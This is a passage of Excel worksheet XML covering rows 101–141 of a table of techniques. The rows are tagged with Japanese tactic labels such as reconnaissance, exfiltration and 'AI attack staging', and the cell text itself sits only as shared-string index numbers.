        <v>646</v>
      </c>
      <c r="E101" s="12" t="s">
        <v>260</v>
      </c>
      <c r="F101" s="13">
        <v>44329</v>
      </c>
      <c r="G101" s="13">
        <v>44329</v>
      </c>
      <c r="H101" s="10" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>偵察</v>
      </c>
      <c r="I101" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="102" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A102" s="29" t="s">
        <v>877</v>
      </c>
      <c r="B102" s="11" t="s">
        <v>878</v>
      </c>
      <c r="C102" s="21" t="s">
        <v>922</v>
      </c>
      <c r="D102" s="21" t="s">
        <v>960</v>
      </c>
      <c r="E102" s="12" t="s">
        <v>879</v>
      </c>
      <c r="F102" s="13">
        <v>45957</v>
      </c>
      <c r="G102" s="13">
        <v>45965</v>
      </c>
      <c r="H102" s="10" t="s">
        <v>55</v>
      </c>
      <c r="I102" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="103" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A103" s="29" t="s">
        <v>880</v>
      </c>
      <c r="B103" s="11" t="s">
        <v>881</v>
      </c>
      <c r="C103" s="21" t="s">
        <v>954</v>
      </c>
      <c r="D103" s="21" t="s">
        <v>959</v>
      </c>
      <c r="E103" s="12" t="s">
        <v>882</v>
      </c>
      <c r="F103" s="13">
        <v>45959</v>
      </c>
      <c r="G103" s="13">
        <v>45967</v>
      </c>
      <c r="H103" s="10" t="s">
        <v>883</v>
      </c>
      <c r="I103" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="104" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A104" s="10" t="s">
        <v>261</v>
      </c>
      <c r="B104" s="11" t="s">
        <v>262</v>
      </c>
      <c r="C104" s="10" t="s">
        <v>647</v>
      </c>
      <c r="D104" s="11" t="s">
        <v>648</v>
      </c>
      <c r="E104" s="12" t="s">
        <v>263</v>
      </c>
      <c r="F104" s="13">
        <v>45728</v>
      </c>
      <c r="G104" s="13">
        <v>45961</v>
      </c>
      <c r="H104" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I104" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="105" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A105" s="10" t="s">
        <v>264</v>
      </c>
      <c r="B105" s="11" t="s">
        <v>265</v>
      </c>
      <c r="C105" s="15" t="s">
        <v>649</v>
      </c>
      <c r="D105" s="15" t="s">
        <v>650</v>
      </c>
      <c r="E105" s="12" t="s">
        <v>266</v>
      </c>
      <c r="F105" s="13">
        <v>44329</v>
      </c>
      <c r="G105" s="13">
        <v>44329</v>
      </c>
      <c r="H105" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I105" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="106" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A106" s="10" t="s">
        <v>267</v>
      </c>
      <c r="B106" s="11" t="s">
        <v>268</v>
      </c>
      <c r="C106" s="15" t="s">
        <v>651</v>
      </c>
      <c r="D106" s="11" t="s">
        <v>652</v>
      </c>
      <c r="E106" s="12" t="s">
        <v>269</v>
      </c>
      <c r="F106" s="13">
        <v>45728</v>
      </c>
      <c r="G106" s="13">
        <v>45728</v>
      </c>
      <c r="H106" s="10" t="str">
        <f>'tactics (ja)'!C17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I106" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="107" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A107" s="29" t="s">
        <v>884</v>
      </c>
      <c r="B107" s="11" t="s">
        <v>885</v>
      </c>
      <c r="C107" s="21" t="s">
        <v>923</v>
      </c>
      <c r="D107" s="21" t="s">
        <v>957</v>
      </c>
      <c r="E107" s="12" t="s">
        <v>886</v>
      </c>
      <c r="F107" s="13">
        <v>45930</v>
      </c>
      <c r="G107" s="13">
        <v>45930</v>
      </c>
      <c r="H107" s="10" t="s">
        <v>336</v>
      </c>
      <c r="I107" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="108" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A108" s="29" t="s">
        <v>887</v>
      </c>
      <c r="B108" s="11" t="s">
        <v>888</v>
      </c>
      <c r="C108" s="21" t="s">
        <v>924</v>
      </c>
      <c r="D108" s="21" t="s">
        <v>958</v>
      </c>
      <c r="E108" s="12" t="s">
        <v>889</v>
      </c>
      <c r="F108" s="13">
        <v>45930</v>
      </c>
      <c r="G108" s="13">
        <v>45930</v>
      </c>
      <c r="H108" s="10" t="s">
        <v>5</v>
      </c>
      <c r="I108" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="109" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A109" s="10" t="s">
        <v>270</v>
      </c>
      <c r="B109" s="11" t="s">
        <v>271</v>
      </c>
      <c r="C109" s="10" t="s">
        <v>653</v>
      </c>
      <c r="D109" s="11" t="s">
        <v>654</v>
      </c>
      <c r="E109" s="12" t="s">
        <v>272</v>
      </c>
      <c r="F109" s="13">
        <v>45728</v>
      </c>
      <c r="G109" s="13">
        <v>45728</v>
      </c>
      <c r="H109" s="10" t="str">
        <f>'tactics (ja)'!$C$14</f>
        <v>永続化</v>
      </c>
      <c r="I109" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="110" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A110" s="10" t="s">
        <v>273</v>
      </c>
      <c r="B110" s="11" t="s">
        <v>274</v>
      </c>
      <c r="C110" s="10" t="s">
        <v>655</v>
      </c>
      <c r="D110" s="15" t="s">
        <v>656</v>
      </c>
      <c r="E110" s="12" t="s">
        <v>275</v>
      </c>
      <c r="F110" s="13">
        <v>45224</v>
      </c>
      <c r="G110" s="13">
        <v>45224</v>
      </c>
      <c r="H110" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I110" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="111" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A111" s="10" t="s">
        <v>276</v>
      </c>
      <c r="B111" s="11" t="s">
        <v>277</v>
      </c>
      <c r="C111" s="10" t="s">
        <v>657</v>
      </c>
      <c r="D111" s="11" t="s">
        <v>658</v>
      </c>
      <c r="E111" s="12" t="s">
        <v>278</v>
      </c>
      <c r="F111" s="13">
        <v>45728</v>
      </c>
      <c r="G111" s="13">
        <v>45728</v>
      </c>
      <c r="H111" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I111" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="112" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A112" s="10" t="s">
        <v>279</v>
      </c>
      <c r="B112" s="11" t="s">
        <v>280</v>
      </c>
      <c r="C112" s="10" t="s">
        <v>659</v>
      </c>
      <c r="D112" s="11" t="s">
        <v>660</v>
      </c>
      <c r="E112" s="12" t="s">
        <v>281</v>
      </c>
      <c r="F112" s="13">
        <v>45393</v>
      </c>
      <c r="G112" s="13">
        <v>45761</v>
      </c>
      <c r="H112" s="10" t="str">
        <f>'tactics (ja)'!$C$5</f>
        <v>コマンド＆コントロール</v>
      </c>
      <c r="I112" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="113" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A113" s="10" t="s">
        <v>282</v>
      </c>
      <c r="B113" s="11" t="s">
        <v>283</v>
      </c>
      <c r="C113" s="15" t="s">
        <v>661</v>
      </c>
      <c r="D113" s="15" t="s">
        <v>662</v>
      </c>
      <c r="E113" s="12" t="s">
        <v>284</v>
      </c>
      <c r="F113" s="13">
        <v>44329</v>
      </c>
      <c r="G113" s="13">
        <v>45943</v>
      </c>
      <c r="H113" s="10" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>偵察</v>
      </c>
      <c r="I113" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="114" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A114" s="10" t="s">
        <v>285</v>
      </c>
      <c r="B114" s="11" t="s">
        <v>286</v>
      </c>
      <c r="C114" s="15" t="s">
        <v>663</v>
      </c>
      <c r="D114" s="11" t="s">
        <v>664</v>
      </c>
      <c r="E114" s="12" t="s">
        <v>287</v>
      </c>
      <c r="F114" s="13">
        <v>44329</v>
      </c>
      <c r="G114" s="13">
        <v>45764</v>
      </c>
      <c r="H114" s="10" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>偵察</v>
      </c>
      <c r="I114" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="115" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A115" s="10" t="s">
        <v>288</v>
      </c>
      <c r="B115" s="11" t="s">
        <v>289</v>
      </c>
      <c r="C115" s="10" t="s">
        <v>665</v>
      </c>
      <c r="D115" s="11" t="s">
        <v>666</v>
      </c>
      <c r="E115" s="12" t="s">
        <v>290</v>
      </c>
      <c r="F115" s="13">
        <v>44329</v>
      </c>
      <c r="G115" s="13">
        <v>45756</v>
      </c>
      <c r="H115" s="10" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>偵察</v>
      </c>
      <c r="I115" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="116" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A116" s="29" t="s">
        <v>890</v>
      </c>
      <c r="B116" s="11" t="s">
        <v>891</v>
      </c>
      <c r="C116" s="26" t="s">
        <v>925</v>
      </c>
      <c r="D116" s="21" t="s">
        <v>956</v>
      </c>
      <c r="E116" s="12" t="s">
        <v>892</v>
      </c>
      <c r="F116" s="13">
        <v>45966</v>
      </c>
      <c r="G116" s="13">
        <v>45967</v>
      </c>
      <c r="H116" s="10" t="s">
        <v>34</v>
      </c>
      <c r="I116" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="117" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A117" s="10" t="s">
        <v>291</v>
      </c>
      <c r="B117" s="11" t="s">
        <v>292</v>
      </c>
      <c r="C117" s="15" t="s">
        <v>667</v>
      </c>
      <c r="D117" s="11" t="s">
        <v>668</v>
      </c>
      <c r="E117" s="12" t="s">
        <v>293</v>
      </c>
      <c r="F117" s="13">
        <v>44329</v>
      </c>
      <c r="G117" s="13">
        <v>45756</v>
      </c>
      <c r="H117" s="10" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>偵察</v>
      </c>
      <c r="I117" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="118" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A118" s="10" t="s">
        <v>294</v>
      </c>
      <c r="B118" s="11" t="s">
        <v>295</v>
      </c>
      <c r="C118" s="10" t="s">
        <v>669</v>
      </c>
      <c r="D118" s="11" t="s">
        <v>670</v>
      </c>
      <c r="E118" s="12" t="s">
        <v>296</v>
      </c>
      <c r="F118" s="13">
        <v>45762</v>
      </c>
      <c r="G118" s="13">
        <v>45762</v>
      </c>
      <c r="H118" s="10" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I118" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="119" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A119" s="10" t="s">
        <v>297</v>
      </c>
      <c r="B119" s="11" t="s">
        <v>298</v>
      </c>
      <c r="C119" s="15" t="s">
        <v>671</v>
      </c>
      <c r="D119" s="15" t="s">
        <v>672</v>
      </c>
      <c r="E119" s="12" t="s">
        <v>299</v>
      </c>
      <c r="F119" s="13">
        <v>45224</v>
      </c>
      <c r="G119" s="13">
        <v>45224</v>
      </c>
      <c r="H119" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I119" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="120" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A120" s="10" t="s">
        <v>300</v>
      </c>
      <c r="B120" s="11" t="s">
        <v>301</v>
      </c>
      <c r="C120" s="15" t="s">
        <v>673</v>
      </c>
      <c r="D120" s="15" t="s">
        <v>674</v>
      </c>
      <c r="E120" s="16" t="s">
        <v>302</v>
      </c>
      <c r="F120" s="13">
        <v>44329</v>
      </c>
      <c r="G120" s="13">
        <v>45756</v>
      </c>
      <c r="H120" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I120" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="121" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A121" s="10" t="s">
        <v>303</v>
      </c>
      <c r="B121" s="11" t="s">
        <v>304</v>
      </c>
      <c r="C121" s="15" t="s">
        <v>675</v>
      </c>
      <c r="D121" s="15" t="s">
        <v>676</v>
      </c>
      <c r="E121" s="12" t="s">
        <v>305</v>
      </c>
      <c r="F121" s="13">
        <v>44329</v>
      </c>
      <c r="G121" s="13">
        <v>45756</v>
      </c>
      <c r="H121" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I121" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="122" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A122" s="10" t="s">
        <v>306</v>
      </c>
      <c r="B122" s="11" t="s">
        <v>307</v>
      </c>
      <c r="C122" s="15" t="s">
        <v>677</v>
      </c>
      <c r="D122" s="15" t="s">
        <v>678</v>
      </c>
      <c r="E122" s="12" t="s">
        <v>308</v>
      </c>
      <c r="F122" s="13">
        <v>45224</v>
      </c>
      <c r="G122" s="13">
        <v>45224</v>
      </c>
      <c r="H122" s="10" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I122" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="123" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A123" s="10" t="s">
        <v>309</v>
      </c>
      <c r="B123" s="11" t="s">
        <v>310</v>
      </c>
      <c r="C123" s="10" t="s">
        <v>679</v>
      </c>
      <c r="D123" s="11" t="s">
        <v>680</v>
      </c>
      <c r="E123" s="12" t="s">
        <v>311</v>
      </c>
      <c r="F123" s="13">
        <v>45728</v>
      </c>
      <c r="G123" s="13">
        <v>45728</v>
      </c>
      <c r="H123" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I123" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="124" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A124" s="10" t="s">
        <v>312</v>
      </c>
      <c r="B124" s="11" t="s">
        <v>313</v>
      </c>
      <c r="C124" s="10" t="s">
        <v>681</v>
      </c>
      <c r="D124" s="11" t="s">
        <v>682</v>
      </c>
      <c r="E124" s="16" t="s">
        <v>314</v>
      </c>
      <c r="F124" s="13">
        <v>45763</v>
      </c>
      <c r="G124" s="13">
        <v>45764</v>
      </c>
      <c r="H124" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I124" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="125" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A125" s="10" t="s">
        <v>315</v>
      </c>
      <c r="B125" s="11" t="s">
        <v>316</v>
      </c>
      <c r="C125" s="10" t="s">
        <v>683</v>
      </c>
      <c r="D125" s="11" t="s">
        <v>684</v>
      </c>
      <c r="E125" s="12" t="s">
        <v>317</v>
      </c>
      <c r="F125" s="13">
        <v>45728</v>
      </c>
      <c r="G125" s="13">
        <v>45728</v>
      </c>
      <c r="H125" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I125" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="126" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A126" s="10" t="s">
        <v>318</v>
      </c>
      <c r="B126" s="11" t="s">
        <v>319</v>
      </c>
      <c r="C126" s="10" t="s">
        <v>685</v>
      </c>
      <c r="D126" s="11" t="s">
        <v>686</v>
      </c>
      <c r="E126" s="12" t="s">
        <v>320</v>
      </c>
      <c r="F126" s="13">
        <v>45728</v>
      </c>
      <c r="G126" s="13">
        <v>45728</v>
      </c>
      <c r="H126" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I126" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="127" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A127" s="10" t="s">
        <v>321</v>
      </c>
      <c r="B127" s="11" t="s">
        <v>322</v>
      </c>
      <c r="C127" s="15" t="s">
        <v>687</v>
      </c>
      <c r="D127" s="11" t="s">
        <v>688</v>
      </c>
      <c r="E127" s="12" t="s">
        <v>323</v>
      </c>
      <c r="F127" s="13">
        <v>44329</v>
      </c>
      <c r="G127" s="13">
        <v>45943</v>
      </c>
      <c r="H127" s="10" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>偵察</v>
      </c>
      <c r="I127" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="128" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A128" s="29" t="s">
        <v>893</v>
      </c>
      <c r="B128" s="11" t="s">
        <v>894</v>
      </c>
      <c r="C128" s="21" t="s">
        <v>926</v>
      </c>
      <c r="D128" s="21" t="s">
        <v>953</v>
      </c>
      <c r="E128" s="12" t="s">
        <v>895</v>
      </c>
      <c r="F128" s="13">
        <v>45930</v>
      </c>
      <c r="G128" s="13">
        <v>45930</v>
      </c>
      <c r="H128" s="10" t="s">
        <v>212</v>
      </c>
      <c r="I128" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="129" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A129" s="29" t="s">
        <v>896</v>
      </c>
      <c r="B129" s="11" t="s">
        <v>897</v>
      </c>
      <c r="C129" s="21" t="s">
        <v>927</v>
      </c>
      <c r="D129" s="21" t="s">
        <v>952</v>
      </c>
      <c r="E129" s="12" t="s">
        <v>898</v>
      </c>
      <c r="F129" s="13">
        <v>45930</v>
      </c>
      <c r="G129" s="13">
        <v>45930</v>
      </c>
      <c r="H129" s="10" t="s">
        <v>55</v>
      </c>
      <c r="I129" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="130" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A130" s="10" t="s">
        <v>324</v>
      </c>
      <c r="B130" s="11" t="s">
        <v>325</v>
      </c>
      <c r="C130" s="15" t="s">
        <v>689</v>
      </c>
      <c r="D130" s="11" t="s">
        <v>690</v>
      </c>
      <c r="E130" s="16" t="s">
        <v>326</v>
      </c>
      <c r="F130" s="13">
        <v>44329</v>
      </c>
      <c r="G130" s="13">
        <v>45756</v>
      </c>
      <c r="H130" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I130" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="131" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A131" s="10" t="s">
        <v>327</v>
      </c>
      <c r="B131" s="11" t="s">
        <v>328</v>
      </c>
      <c r="C131" s="15" t="s">
        <v>691</v>
      </c>
      <c r="D131" s="11" t="s">
        <v>692</v>
      </c>
      <c r="E131" s="16" t="s">
        <v>329</v>
      </c>
      <c r="F131" s="13">
        <v>44329</v>
      </c>
      <c r="G131" s="13">
        <v>44329</v>
      </c>
      <c r="H131" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I131" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="132" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A132" s="29" t="s">
        <v>899</v>
      </c>
      <c r="B132" s="11" t="s">
        <v>900</v>
      </c>
      <c r="C132" s="21" t="s">
        <v>951</v>
      </c>
      <c r="D132" s="21" t="s">
        <v>955</v>
      </c>
      <c r="E132" s="16" t="s">
        <v>901</v>
      </c>
      <c r="F132" s="13">
        <v>45965</v>
      </c>
      <c r="G132" s="13">
        <v>45966</v>
      </c>
      <c r="H132" s="10" t="s">
        <v>51</v>
      </c>
      <c r="I132" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="133" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A133" s="10" t="s">
        <v>330</v>
      </c>
      <c r="B133" s="11" t="s">
        <v>331</v>
      </c>
      <c r="C133" s="10" t="s">
        <v>693</v>
      </c>
      <c r="D133" s="11" t="s">
        <v>694</v>
      </c>
      <c r="E133" s="12" t="s">
        <v>332</v>
      </c>
      <c r="F133" s="13">
        <v>44329</v>
      </c>
      <c r="G133" s="13">
        <v>45756</v>
      </c>
      <c r="H133" s="10" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I133" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="134" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A134" s="10" t="s">
        <v>333</v>
      </c>
      <c r="B134" s="11" t="s">
        <v>334</v>
      </c>
      <c r="C134" s="15" t="s">
        <v>695</v>
      </c>
      <c r="D134" s="11" t="s">
        <v>696</v>
      </c>
      <c r="E134" s="12" t="s">
        <v>335</v>
      </c>
      <c r="F134" s="13">
        <v>45224</v>
      </c>
      <c r="G134" s="13">
        <v>45411</v>
      </c>
      <c r="H134" s="10" t="str">
        <f>'tactics (ja)'!$C$6</f>
        <v>資格情報へのアクセス</v>
      </c>
      <c r="I134" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="135" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A135" s="29" t="s">
        <v>902</v>
      </c>
      <c r="B135" s="11" t="s">
        <v>903</v>
      </c>
      <c r="C135" s="21" t="s">
        <v>928</v>
      </c>
      <c r="D135" s="21" t="s">
        <v>929</v>
      </c>
      <c r="E135" s="12" t="s">
        <v>904</v>
      </c>
      <c r="F135" s="13">
        <v>45957</v>
      </c>
      <c r="G135" s="13">
        <v>45965</v>
      </c>
      <c r="H135" s="10" t="s">
        <v>789</v>
      </c>
      <c r="I135" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="136" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A136" s="10" t="s">
        <v>337</v>
      </c>
      <c r="B136" s="11" t="s">
        <v>338</v>
      </c>
      <c r="C136" s="15" t="s">
        <v>697</v>
      </c>
      <c r="D136" s="15" t="s">
        <v>698</v>
      </c>
      <c r="E136" s="16" t="s">
        <v>339</v>
      </c>
      <c r="F136" s="13">
        <v>44329</v>
      </c>
      <c r="G136" s="13">
        <v>44329</v>
      </c>
      <c r="H136" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I136" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="137" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A137" s="10" t="s">
        <v>340</v>
      </c>
      <c r="B137" s="11" t="s">
        <v>341</v>
      </c>
      <c r="C137" s="15" t="s">
        <v>699</v>
      </c>
      <c r="D137" s="11" t="s">
        <v>700</v>
      </c>
      <c r="E137" s="12" t="s">
        <v>342</v>
      </c>
      <c r="F137" s="13">
        <v>44329</v>
      </c>
      <c r="G137" s="13">
        <v>44944</v>
      </c>
      <c r="H137" s="10" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I137" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="138" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A138" s="10" t="s">
        <v>343</v>
      </c>
      <c r="B138" s="11" t="s">
        <v>344</v>
      </c>
      <c r="C138" s="15" t="s">
        <v>701</v>
      </c>
      <c r="D138" s="15" t="s">
        <v>702</v>
      </c>
      <c r="E138" s="12" t="s">
        <v>345</v>
      </c>
      <c r="F138" s="13">
        <v>45224</v>
      </c>
      <c r="G138" s="13">
        <v>45224</v>
      </c>
      <c r="H138" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I138" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="139" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A139" s="10" t="s">
        <v>346</v>
      </c>
      <c r="B139" s="11" t="s">
        <v>347</v>
      </c>
      <c r="C139" s="15" t="s">
        <v>703</v>
      </c>
      <c r="D139" s="15" t="s">
        <v>704</v>
      </c>
      <c r="E139" s="12" t="s">
        <v>348</v>
      </c>
      <c r="F139" s="13">
        <v>44585</v>
      </c>
      <c r="G139" s="13">
        <v>45756</v>
      </c>
      <c r="H139" s="10" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I139" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="140" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A140" s="10" t="s">
        <v>349</v>
      </c>
      <c r="B140" s="11" t="s">
        <v>350</v>
      </c>
      <c r="C140" s="15" t="s">
        <v>705</v>
      </c>
      <c r="D140" s="15" t="s">
        <v>706</v>
      </c>
      <c r="E140" s="16" t="s">
        <v>351</v>
      </c>
      <c r="F140" s="13">
        <v>44329</v>
      </c>
      <c r="G140" s="13">
        <v>44329</v>
      </c>
      <c r="H140" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I140" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="141" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A141" s="10" t="s">
        <v>352</v>
      </c>
      <c r="B141" s="11" t="s">
        <v>353</v>
      </c>
      <c r="C141" s="15" t="s">
        <v>707</v>
      </c>
      <c r="D141" s="15" t="s">
        <v>708</v>
      </c>
      <c r="E141" s="12" t="s">
        <v>354</v>
      </c>
      <c r="F141" s="13">
        <v>44329</v>
      </c>
      <c r="G141" s="13">
        <v>45303</v>
      </c>
      <c r="H141" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I141" s="10" t="s">
        <v>6</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="11"/>
  <hyperlinks>
    <hyperlink ref="E5" r:id="rId1" xr:uid="{00000000-0004-0000-0400-000000000000}"/>
    <hyperlink ref="E6" r:id="rId2" xr:uid="{00000000-0004-0000-0400-000001000000}"/>
    <hyperlink ref="E7" r:id="rId3" xr:uid="{00000000-0004-0000-0400-000002000000}"/>
    <hyperlink ref="E8" r:id="rId4" xr:uid="{00000000-0004-0000-0400-000003000000}"/>
    <hyperlink ref="E9" r:id="rId5" xr:uid="{00000000-0004-0000-0400-000004000000}"/>
    <hyperlink ref="E10" r:id="rId6" xr:uid="{00000000-0004-0000-0400-000005000000}"/>
    <hyperlink ref="E11" r:id="rId7" xr:uid="{00000000-0004-0000-0400-000006000000}"/>
    <hyperlink ref="E12" r:id="rId8" xr:uid="{00000000-0004-0000-0400-000007000000}"/>
    <hyperlink ref="E13" r:id="rId9" xr:uid="{00000000-0004-0000-0400-000008000000}"/>
    <hyperlink ref="E15" r:id="rId10" xr:uid="{00000000-0004-0000-0400-000009000000}"/>
    <hyperlink ref="E16" r:id="rId11" xr:uid="{00000000-0004-0000-0400-00000A000000}"/>
    <hyperlink ref="E17" r:id="rId12" xr:uid="{00000000-0004-0000-0400-00000B000000}"/>
    <hyperlink ref="E19" r:id="rId13" xr:uid="{00000000-0004-0000-0400-00000C000000}"/>
    <hyperlink ref="E20" r:id="rId14" xr:uid="{00000000-0004-0000-0400-00000D000000}"/>
    <hyperlink ref="E21" r:id="rId15" xr:uid="{00000000-0004-0000-0400-00000E000000}"/>
    <hyperlink ref="E22" r:id="rId16" xr:uid="{00000000-0004-0000-0400-00000F000000}"/>
    <hyperlink ref="E23" r:id="rId17" xr:uid="{00000000-0004-0000-0400-000010000000}"/>
    <hyperlink ref="E24" r:id="rId18" xr:uid="{00000000-0004-0000-0400-000011000000}"/>
    <hyperlink ref="E25" r:id="rId19" xr:uid="{00000000-0004-0000-0400-000012000000}"/>
    <hyperlink ref="E26" r:id="rId20" xr:uid="{00000000-0004-0000-0400-000013000000}"/>
    <hyperlink ref="E27" r:id="rId21" xr:uid="{00000000-0004-0000-0400-000014000000}"/>
    <hyperlink ref="E28" r:id="rId22" xr:uid="{00000000-0004-0000-0400-000015000000}"/>
    <hyperlink ref="E29" r:id="rId23" xr:uid="{00000000-0004-0000-0400-000016000000}"/>
    <hyperlink ref="E31" r:id="rId24" xr:uid="{00000000-0004-0000-0400-000017000000}"/>
    <hyperlink ref="E33" r:id="rId25" xr:uid="{00000000-0004-0000-0400-000018000000}"/>
    <hyperlink ref="E34" r:id="rId26" xr:uid="{00000000-0004-0000-0400-000019000000}"/>
    <hyperlink ref="E35" r:id="rId27" xr:uid="{00000000-0004-0000-0400-00001A000000}"/>
    <hyperlink ref="E37" r:id="rId28" xr:uid="{00000000-0004-0000-0400-00001B000000}"/>
